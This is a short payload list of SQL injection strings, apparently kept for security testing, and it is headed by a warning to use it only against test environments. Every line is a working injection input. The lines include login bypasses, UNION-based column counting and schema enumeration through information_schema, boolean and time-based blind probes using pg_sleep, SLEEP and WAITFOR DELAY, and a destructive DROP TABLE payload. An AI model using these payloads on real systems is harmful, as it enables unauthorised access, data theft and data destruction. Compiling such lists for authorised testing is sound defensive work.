# SQL Injection Test Payloads
# Use with caution - only against test environments
# Each line is a separate payload

' OR '1'='1
' OR '1'='1'--
' OR '1'='1'/*
" OR "1"="1
" OR "1"="1"--
1' ORDER BY 1--
1' ORDER BY 10--
1' UNION SELECT NULL--
1' UNION SELECT NULL,NULL--
1' UNION SELECT NULL,NULL,NULL--
'; DROP TABLE providers;--
' AND 1=1--
' AND 1=2--
' AND SUBSTRING(version(),1,1)='P'--
1; SELECT pg_sleep(5);--
' || pg_sleep(5)--
'||(SELECT version())||'
' AND (SELECT COUNT(*) FROM information_schema.tables)>0--
1' AND '1'='1
1' AND '1'='2
' HAVING 1=1--
' GROUP BY 1--
admin'--
' OR EXISTS(SELECT * FROM users)--
' OR 1=1 LIMIT 1--
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
'; WAITFOR DELAY '0:0:5'--
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
